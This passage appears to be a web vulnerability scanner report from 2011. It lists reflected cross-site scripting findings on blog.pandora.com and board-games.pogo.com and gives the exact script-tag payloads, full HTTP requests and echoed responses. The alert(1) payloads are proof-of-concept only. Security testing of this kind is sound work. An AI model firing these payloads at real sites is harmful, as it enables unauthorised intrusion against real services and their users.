<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)</script>5fa8c585472 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)</script>2f7a6237729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 was not found on this server.</p> ...[SNIP]...
3.448. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://blog.pandora.com
Path: /pandora/assets_c/2010/11/sd
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)</script>c919746079d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)</script>6a443b18f71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)</script>6df0b546c02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)</script>7fd9127d43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)</script>64c6f95a91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)</script>9480ff2f53c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)</script>60fe94bbc36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)</script>042e399b16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)</script>10f75eed66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)</script>3ef283336f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)</script>d3e39760b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)</script>7529f0abeb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /press711ea<script>alert(1)</script>7529f0abeb0 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /press711ea<script>alert(1)</script>7529f0abeb0 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)</script>eadbbafd7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show98567<script>alert(1)</script>eadbbafd7b9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show98567<script>alert(1)</script>eadbbafd7b9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)</script>c76f8eb676e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show33cf5<script>alert(1)</script>c76f8eb676e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show33cf5<script>alert(1)</script>c76f8eb676e/ was not found on this server.</p> ...[SNIP]...
3.462. http://board-games.pogo.com/games/monopoly [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://board-games.pogo.com
Path: /games/monopoly
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade82"><script>alert(1)</script>96953023051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/monopoly?ade82"><script>alert(1)</script>96953023051=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://board-games.pogo.com/games/monopoly?ade82"><script>alert(1)</script>96953023051=1"/> ...[SNIP]...
3.463. http://board-games.pogo.com/games/online-chess [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://board-games.pogo.com
Path: /games/online-chess
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cb8"><script>alert(1)</script>7fe9a271473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://board-games.pogo.com/games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1"/> ...[SNIP]...
3.464. http://board-games.pogo.com/games/risk [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://board-games.pogo.com
Path: /games/risk
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d31f"><script>alert(1)</script>879217c7909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
